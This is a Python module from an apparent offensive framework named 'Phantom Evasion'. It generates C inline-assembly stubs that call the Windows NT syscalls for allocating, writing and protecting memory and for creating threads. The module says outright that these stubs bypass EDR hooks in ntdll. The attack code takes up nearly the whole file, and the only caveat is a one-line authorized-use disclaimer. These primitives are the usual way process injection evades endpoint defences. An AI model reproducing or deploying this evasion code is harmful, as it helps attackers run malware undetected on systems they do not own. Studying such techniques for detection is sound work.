"""
Phantom Evasion - Direct Syscalls EDR Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_direct_syscalls() -> Dict[str, Any]:
    """Generate direct NT syscall stubs for core memory/thread operations.

    Direct syscalls bypass user-mode hooks placed by EDR products on ntdll.dll
    by invoking the kernel via the ``syscall`` instruction directly, using
    hard-coded or dynamically resolved syscall service numbers (SSNs).

    The generated stubs cover:
        - NtAllocateVirtualMemory
        - NtWriteVirtualMemory
        - NtProtectVirtualMemory
        - NtCreateThreadEx

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_DIRECT_SYSCALLS__
#define __PHANTOM_DIRECT_SYSCALLS__
// Direct Syscalls – generated by Phantom Evasion
// Layer 2 – EDR Bypass
// SSNs are resolved at runtime via the Hell's Gate / Halo's Gate technique.
// The inline __asm__ blocks emit the syscall instruction directly,
// bypassing any user-mode hooks installed by EDR products in ntdll.

#include <windows.h>

// Syscall service numbers – populated at runtime by resolve_ssns()
static DWORD ssn_NtAllocateVirtualMemory = 0;
static DWORD ssn_NtWriteVirtualMemory    = 0;
static DWORD ssn_NtProtectVirtualMemory  = 0;
static DWORD ssn_NtCreateThreadEx        = 0;

// ── NtAllocateVirtualMemory ──────────────────────────────────────────────────
__attribute__((naked))
NTSTATUS DirectNtAllocateVirtualMemory(
        HANDLE ProcessHandle, PVOID *BaseAddress,
        ULONG_PTR ZeroBits, PSIZE_T RegionSize,
        ULONG AllocationType, ULONG Protect) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "syscall\n\t"
        "ret\n\t"
        :
        : "m"(ssn_NtAllocateVirtualMemory)
        : "rax", "r10"
    );
}

// ── NtWriteVirtualMemory ─────────────────────────────────────────────────────
__attribute__((naked))
NTSTATUS DirectNtWriteVirtualMemory(
        HANDLE ProcessHandle, PVOID BaseAddress,
        PVOID Buffer, SIZE_T NumberOfBytesToWrite,
        PSIZE_T NumberOfBytesWritten) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "syscall\n\t"
        "ret\n\t"
        :
        : "m"(ssn_NtWriteVirtualMemory)
        : "rax", "r10"
    );
}

// ── NtProtectVirtualMemory ───────────────────────────────────────────────────
__attribute__((naked))
NTSTATUS DirectNtProtectVirtualMemory(
        HANDLE ProcessHandle, PVOID *BaseAddress,
        PSIZE_T RegionSize, ULONG NewProtect,
        PULONG OldProtect) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "syscall\n\t"
        "ret\n\t"
        :
        : "m"(ssn_NtProtectVirtualMemory)
        : "rax", "r10"
    );
}

// ── NtCreateThreadEx ─────────────────────────────────────────────────────────
__attribute__((naked))
NTSTATUS DirectNtCreateThreadEx(
        PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess,
        POBJECT_ATTRIBUTES ObjectAttributes, HANDLE ProcessHandle,
        PVOID StartRoutine, PVOID Argument,
        ULONG CreateFlags, SIZE_T ZeroBits,
        SIZE_T StackSize, SIZE_T MaximumStackSize,
        PVOID AttributeList) {
    __asm__ volatile (
        "mov eax, %0\n\t"
        "mov r10, rcx\n\t"
        "syscall\n\t"
        "ret\n\t"
        :
        : "m"(ssn_NtCreateThreadEx)
        : "rax", "r10"
    );
}
#endif /* __PHANTOM_DIRECT_SYSCALLS__ */
"""

    return {
        "code": code,
        "description": "Direct syscall stubs for NtAllocate/Write/ProtectVirtualMemory and NtCreateThreadEx",
        "layer": "Layer 2 - EDR Bypass",
        "name": "direct_syscalls",
    }
